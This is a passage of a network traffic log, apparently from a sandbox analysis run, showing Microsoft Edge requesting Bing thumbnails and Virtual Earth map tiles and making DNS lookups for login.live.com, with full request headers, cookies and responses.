cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3703
cache-control: public, max-age=5183983
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a779
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.Z3PR9Rt8bvj84BMxrqe6YwHaFJ&w=80&h=80&c=1&vt=10&bgcl=74f1cf&r=0&o=6&pid=5.1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OIP.Z3PR9Rt8bvj84BMxrqe6YwHaFJ&w=80&h=80&c=1&vt=10&bgcl=74f1cf&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2563
cache-control: public, max-age=5184000
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a77c
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.b6087622-806e-4147-afe9-58a9168da92f&w=32&h=32&o=6&pid=AdsPlus

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.b6087622-806e-4147-afe9-58a9168da92f&w=32&h=32&o=6&pid=AdsPlus HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 10635
cache-control: public, max-age=1209600
date: Wed, 04 Dec 2024 10:09:17 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306957.4050aa34
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OVP.EI3-oP7ngHedRhWMRNZzEAHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OVP.EI3-oP7ngHedRhWMRNZzEAHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9
cookie: dsc=order=Video
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306948&WTS=63868903693&PRVCW=1280&PRVCH=601
DNS

3.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.135.221.88.in-addr.arpa

IN PTR

Response

3.135.221.88.in-addr.arpa

IN PTR

a88-221-135-3deploystaticakamaitechnologiescom
DNS

login.live.com

Remote address:

8.8.8.8:53

Request

login.live.com

IN A

Response

login.live.com

IN CNAME

login.msa.msidentity.com

login.msa.msidentity.com

IN CNAME

www.tm.lg.prod.aadmsa.trafficmanager.net

www.tm.lg.prod.aadmsa.trafficmanager.net

IN CNAME

prdv4a.aadg.msidentity.com

prdv4a.aadg.msidentity.com

IN CNAME

www.tm.v4.a.prd.aadg.akadns.net

www.tm.v4.a.prd.aadg.akadns.net

IN A

20.190.160.14

www.tm.v4.a.prd.aadg.akadns.net

IN A

40.126.32.133

www.tm.v4.a.prd.aadg.akadns.net

IN A

40.126.32.136

www.tm.v4.a.prd.aadg.akadns.net

IN A

40.126.32.134

www.tm.v4.a.prd.aadg.akadns.net

IN A

40.126.32.72

www.tm.v4.a.prd.aadg.akadns.net

IN A

40.126.32.76

www.tm.v4.a.prd.aadg.akadns.net

IN A

20.190.160.22

www.tm.v4.a.prd.aadg.akadns.net

IN A

20.190.160.17
DNS

login.live.com

Remote address:

8.8.8.8:53

Request

login.live.com

IN A

Response

login.live.com

IN CNAME

login.msa.msidentity.com

login.msa.msidentity.com

IN CNAME

www.tm.lg.prod.aadmsa.trafficmanager.net

www.tm.lg.prod.aadmsa.trafficmanager.net

IN CNAME

prdv4a.aadg.msidentity.com

prdv4a.aadg.msidentity.com

IN CNAME

www.tm.v4.a.prd.aadg.trafficmanager.net

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

20.190.160.22

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

20.190.160.14

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

40.126.32.72

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

40.126.32.140

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

40.126.32.74

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

40.126.32.138

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

40.126.32.68

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

40.126.32.136
GET

https://t.ssl.ak.dynamic.tiles.virtualearth.net/comp/stl?ctpv=5&og=2578

msedge.exe

Remote address:

23.73.138.225:443

Request

GET /comp/stl?ctpv=5&og=2578 HTTP/2.0
host: t.ssl.ak.dynamic.tiles.virtualearth.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 2944
content-type: application/json
content-encoding: gzip
server: Kestrel
access-control-allow-origin: *
access-control-expose-headers: *
timing-allow-origin: *
x-bm-traceid: 3be74caa15934d2ab6e6bd7930970bfc
strict-transport-security: max-age=2592000
x-bm-srv: DU0000316A
x-powered-by: ASP.NET
x-ve-server-aztbe: DU01EAP0000316A
cache-control: public, max-age=30461689
expires: Fri, 21 Nov 2025 23:43:06 GMT
date: Wed, 04 Dec 2024 10:08:17 GMT
alt-svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
vary: Accept-Encoding
GET

https://t.ssl.ak.dynamic.tiles.virtualearth.net/comp/stl?ods=mvt&sharedcs=1&v=9.33&og=2578

msedge.exe

Remote address:

23.73.138.225:443

Request

GET /comp/stl?ods=mvt&sharedcs=1&v=9.33&og=2578 HTTP/2.0
host: t.ssl.ak.dynamic.tiles.virtualearth.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: application/json
content-encoding: gzip
server: Kestrel
access-control-allow-origin: *
access-control-expose-headers: *
timing-allow-origin: *
x-bm-traceid: 3d037bcb8544419daca46bcb4ae5d52a
strict-transport-security: max-age=2592000
x-bm-srv: DU000033A0
x-powered-by: ASP.NET
x-ve-server-aztbe: DU01EAP000033A0
content-length: 6861
cache-control: public, max-age=30461746
expires: Fri, 21 Nov 2025 23:44:03 GMT
date: Wed, 04 Dec 2024 10:08:17 GMT
vary: Accept-Encoding
GET

https://t.ssl.ak.dynamic.tiles.virtualearth.net/comp/stl/sprite.json?ods=mvt&mbxs=33b050cc-ba4e-4350-a5b7-4171aec234a2&ur=us&v=9.33&og=2578&features=mvttxtmaxw,logo,lmktxtopt&mkt=en-GB&txtfit=tf

msedge.exe

Remote address:

23.73.138.225:443

Request

GET /comp/stl/sprite.json?ods=mvt&mbxs=33b050cc-ba4e-4350-a5b7-4171aec234a2&ur=us&v=9.33&og=2578&features=mvttxtmaxw,logo,lmktxtopt&mkt=en-GB&txtfit=tf HTTP/2.0
host: t.ssl.ak.dynamic.tiles.virtualearth.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: application/json
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
origin: https://www.bing.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: application/json
content-encoding: gzip
server: Kestrel
access-control-allow-origin: *
access-control-expose-headers: *
timing-allow-origin: *
x-bm-traceid: f487d04d5d73431b9602b4516ad4df1e
strict-transport-security: max-age=2592000
x-bm-srv: DU000031D8
x-powered-by: ASP.NET
x-ve-server-aztbe: DU01EAP000031D8
content-length: 4203
cache-control: public, max-age=30461737
expires: Fri, 21 Nov 2025 23:43:54 GMT
date: Wed, 04 Dec 2024 10:08:17 GMT
vary: Accept-Encoding
GET

https://t.ssl.ak.dynamic.tiles.virtualearth.net/comp/ch/10-512-340.mvt?mkt=en-GB&it=G,LC,AP,L,LA&jp=0&js=1&tj=1&ur=gb&cstl=s23&mvt=1&features=mvt,mvttxtmaxw,mvtfcall,lsoft&og=2578&st=bld|v:0_g|pv:1&sv=9.33

msedge.exe

Remote address:

23.73.138.225:443

Request

GET /comp/ch/10-512-340.mvt?mkt=en-GB&it=G,LC,AP,L,LA&jp=0&js=1&tj=1&ur=gb&cstl=s23&mvt=1&features=mvt,mvttxtmaxw,mvtfcall,lsoft&og=2578&st=bld|v:0_g|pv:1&sv=9.33 HTTP/2.0
host: t.ssl.ak.dynamic.tiles.virtualearth.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
origin: https://www.bing.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 30567
content-type: application/vnd.mapbox-vector-tile
content-encoding: gzip
server: Kestrel
access-control-allow-origin: *
access-control-expose-headers: *
timing-allow-origin: *
x-bm-traceid: b575fc78755c419db25b1144a7d64b3a
strict-transport-security: max-age=2592000
x-ve-tfe: DU00003199
x-bm-srv: DU00003199
x-ve-tilemeta-product-ids: 243,237
x-powered-by: ASP.NET
x-ve-server-aztbe: DU01EAP00003199
cache-control: public, max-age=30441455
expires: Fri, 21 Nov 2025 18:05:52 GMT
date: Wed, 04 Dec 2024 10:08:17 GMT
vary: Accept-Encoding
GET

https://t.ssl.ak.dynamic.tiles.virtualearth.net/comp/stl?ods=mvt&cs=33B050CC-BA4E-4350-A5B7-4171AEC234A2&v=9.33&og=2578&culture=en-GB

msedge.exe

Remote address:

23.73.138.225:443

Request

GET /comp/stl?ods=mvt&cs=33B050CC-BA4E-4350-A5B7-4171AEC234A2&v=9.33&og=2578&culture=en-GB HTTP/2.0
host: t.ssl.ak.dynamic.tiles.virtualearth.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: application/json
content-encoding: gzip
server: Kestrel
access-control-allow-origin: *
access-control-expose-headers: *
timing-allow-origin: *
x-bm-traceid: 8cd332e63e4f41c9b8e3d076c304d2b2
strict-transport-security: max-age=2592000
x-bm-srv: DU000031DD
x-powered-by: ASP.NET
x-ve-server-aztbe: DU01EAP000031DD
content-length: 8690
cache-control: public, max-age=30461679
expires: Fri, 21 Nov 2025 23:42:56 GMT
date: Wed, 04 Dec 2024 10:08:17 GMT
vary: Accept-Encoding
GET

https://t.ssl.ak.dynamic.tiles.virtualearth.net/comp/ch/10-511-340.mvt?mkt=en-GB&it=G,LC,AP,L,LA&jp=0&js=1&tj=1&ur=gb&cstl=s23&mvt=1&features=mvt,mvttxtmaxw,mvtfcall,lsoft&og=2578&st=bld|v:0_g|pv:1&sv=9.33

msedge.exe

Remote address:

23.73.138.225:443

Request

GET /comp/ch/10-511-340.mvt?mkt=en-GB&it=G,LC,AP,L,LA&jp=0&js=1&tj=1&ur=gb&cstl=s23&mvt=1&features=mvt,mvttxtmaxw,mvtfcall,lsoft&og=2578&st=bld|v:0_g|pv:1&sv=9.33 HTTP/2.0
host: t.ssl.ak.dynamic.tiles.virtualearth.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
origin: https://www.bing.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 50325
content-type: application/vnd.mapbox-vector-tile
content-encoding: gzip
server: Kestrel
access-control-allow-origin: *
access-control-expose-headers: *
timing-allow-origin: *
x-bm-traceid: 8c2ddf411a5345b3a0ebf3283e5b9ec9
strict-transport-security: max-age=2592000
x-ve-tfe: DU00003181
x-bm-srv: DU00003181
x-ve-tilemeta-product-ids: 243,237
x-powered-by: ASP.NET
x-ve-server-aztbe: DU01EAP00003181
cache-control: public, max-age=30444643
expires: Fri, 21 Nov 2025 18:59:00 GMT
date: Wed, 04 Dec 2024 10:08:17 GMT
vary: Accept-Encoding
GET

https://t.ssl.ak.tiles.virtualearth.net/tiles/sre03131313111?g=14792&n=t

msedge.exe

Remote address:

23.73.138.225:443

Request

GET /tiles/sre03131313111?g=14792&n=t HTTP/2.0
host: t.ssl.ak.tiles.virtualearth.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 20435
content-type: image/png
last-modified: Tue, 12 Nov 2024 06:09:54 GMT
etag: "14792"
server: Kestrel
access-control-allow-origin: *
access-control-expose-headers: X-VE-TILEMETA-CaptureDatesRange, X-VE-TILEMETA-CaptureDateMaxYYMM
x-ve-tfe: DUB00094C3
x-ve-aztbe: DUB00094D7
x-ve-ac: 5033
x-ve-id: 8030_165612357
x-ve-tilemeta-capturedatesrange: 4/1/1900-4/1/2100
x-ve-tilemeta-capturedatemaxyymm: 0004
x-ve-server-tfe: DUBEEAP000094D7
x-ve-server-aztbe: DUBEEAP000094D7
x-powered-by: ASP.NET
x-ve-server-tfe: DUBEEAP000094C3
x-ve-server-aztbe: DUBEEAP000094C3
cache-control: public, max-age=29752134
expires: Thu, 13 Nov 2025 18:37:12 GMT
date: Wed, 04 Dec 2024 10:08:18 GMT
GET

https://t.ssl.ak.tiles.virtualearth.net/tiles/sre03131313110?g=14792&n=t

msedge.exe

Remote address:

23.73.138.225:443

Request

GET /tiles/sre03131313110?g=14792&n=t HTTP/2.0
host: t.ssl.ak.tiles.virtualearth.net
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: cors
